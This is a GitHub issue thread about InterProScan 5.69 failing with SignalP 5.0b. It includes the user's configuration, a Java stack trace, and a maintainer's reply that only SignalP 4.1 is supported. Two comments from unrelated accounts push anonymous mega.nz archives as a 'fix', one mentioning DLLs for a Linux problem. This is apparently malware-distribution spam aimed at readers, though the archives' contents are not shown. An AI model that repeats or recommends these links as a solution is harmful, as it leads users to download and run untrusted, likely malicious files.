### ISSUE TITLE
Error running InterProScan v5.69-101.0 with SignalP 5.0b

### ISSUE THREAD

**Issue by Carolinacanettieri** [ebi-pf-team/interproscan#378]
Hi,

These are my machine info:
> Linux herculesd1 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64

I appended SignalP v 5.0b to Interproscan v5.69-101.0 by adding the following lines to interproscan.properties file:

> `#`SignalP v5.0 #
> signalp_euk.signature.library.release=5.0
> signalp_gram_positive.signature.library.release=5.0
> signalp_gram_negative.signature.library.release=5.0
> binary.signalp.path=/users-d2/carolina.kurotusch/programs/signalp-5.0b/bin/signalp

When I run interpro, I get the following message:

```
18/09/2024 20:12:32:429 Welcome to InterProScan-5.69-101.0
18/09/2024 20:12:32:630 Running InterProScan v5 in STANDALONE mode... on Linux
18/09/2024 20:13:18:412 RunID: hercules12_20240918_201317768_1umd
18/09/2024 20:13:36:438 Loading file /path/to/file
18/09/2024 20:13:36:440 Running the following analyses:
[AntiFam-7.0,CDD-3.20,Coils-2.2.1,FunFam-4.3.0,Gene3D-4.3.0,Hamap-2023_05,MobiDBLite-2.0,NCBIfam-15.0,PANTHER-18.0,Pfam-37.0,Phobius-1.01,PIRSF-3.10,PIRSR-2023_05,PRINTS-42.0,ProSitePatterns-2023_05,ProSiteProfiles-2023_05,SFLD-4,SignalP_EUK-5.0,SignalP_GRAM_NEGATIVE-5.0,SignalP_GRAM_POSITIVE-5.0,SMART-9.0,SUPERFAMILY-1.75,TMHMM-2.0c]

Available matches will be retrieved from the pre-calculated match lookup service.

Matches for any sequences that are not represented in the lookup service will be calculated locally.

2024-09-18 20:13:45,501 [amqEmbeddedWorkerJmsContainer-4 [uk.ac.ebi.interpro.scan.management.model.implementations.RunBinaryStep:199] ERROR - Command line failed with exit code: 255
Command: perl /users-d2/carolina.kurotusch/programs/signalp-5.0b/bin/signalp -T 
Error output from binary:
Unrecognized character \x7F; marked by <-- HERE after <-- HERE near column 1 at /users-d2/carolina.kurotusch/programs/signalp-5.0b/bin/signalp line 1.

	at uk.ac.ebi.interpro.scan.management.model.implementations.RunBinaryStep.execute(RunBinaryStep.java:201) ~[interproscan-management-5.69-101.0.jar:?]
	at uk.ac.ebi.interpro.scan.jms.activemq.StepExecutionTransactionImpl.executeInTransaction(StepExecutionTransactionImpl.java:87) ~[interproscan-5.jar:?]
	at jdk.internal.reflect.GeneratedMethodAccessor100.invoke(Unknown Source) ~[?:?]
	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?]
	at java.lang.reflect.Method.invoke(Method.java:564) ~[?:?]
	at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:344) ~[spring-aop-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:198) ~[spring-aop-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:163) ~[spring-aop-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.transaction.interceptor.TransactionAspectSupport.invokeWithinTransaction(TransactionAspectSupport.java:367) ~[spring-tx-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:118) ~[spring-tx-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:186) ~[spring-aop-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:212) ~[spring-aop-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at com.sun.proxy.$Proxy141.executeInTransaction(Unknown Source) ~[?:?]
	at uk.ac.ebi.interpro.scan.jms.worker.LocalJobQueueListener.onMessage(LocalJobQueueListener.java:200) [interproscan-5.jar:?]
	at org.springframework.jms.listener.AbstractMessageListenerContainer.doInvokeListener(AbstractMessageListenerContainer.java:761) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.AbstractMessageListenerContainer.invokeListener(AbstractMessageListenerContainer.java:699) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.AbstractMessageListenerContainer.doExecuteListener(AbstractMessageListenerContainer.java:674) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.AbstractPollingMessageListenerContainer.doReceiveAndExecute(AbstractPollingMessageListenerContainer.java:318) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.AbstractPollingMessageListenerContainer.receiveAndExecute(AbstractPollingMessageListenerContainer.java:257) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.DefaultMessageListenerContainer$AsyncMessageListenerInvoker.invokeListener(DefaultMessageListenerContainer.java:1186) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.DefaultMessageListenerContainer$AsyncMessageListenerInvoker.executeOngoingLoop(DefaultMessageListenerContainer.java:1176) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at org.springframework.jms.listener.DefaultMessageListenerContainer$AsyncMessageListenerInvoker.run(DefaultMessageListenerContainer.java:1073) [spring-jms-5.2.24.RELEASE.jar:5.2.24.RELEASE]
	at java.lang.Thread.run(Thread.java:832) [?:?]

2024-09-18 20:13:45,518 [amqEmbeddedWorkerJmsContainer-4] [uk.ac.ebi.interpro.scan.jms.worker.LocalJobQueueListener:218] ERROR - The exception is :
2024-09-18 20:13:45,520 [amqEmbeddedWorkerJmsContainer-4] [uk.ac.ebi.interpro.scan.jms.worker.LocalJobQueueListener:222] ERROR - StepExecution with errors - stepName: stepSignalPGramNegativeTempOptionCheck
2024-09-18 20:13:45,632 [main] [uk.ac.ebi.interpro.scan.jms.master.StandaloneBlackBoxMaster:190] WARN - StepInstance 87 is being re-run following a failure.
```

It seems that signalp binary is being read with perl instead of bash. I could not figure it out by looking at other opened issues here or other bioinfo communities. I am an intermediary bash user. I apologize in advance if I have inadvertently missed something.

**Comment by Aljallaf100** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by Anju023** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

**Comment by Rohit-Satyam** [comment]
I am facing a similar issue with signalp6

**Comment by matthiasblum** [comment]
@Carolinacanettieri, @Rohit-Satyam 

Sorry for the slow reply. InterProScan does not support SignalP 5 and SignalP 6 at the moment. It only support [SignalP 4.1](https://services.healthtech.dtu.dk/cgi-bin/sw_request?software=signalp&version=4.1&packageversion=4.1g&platform=Linux).
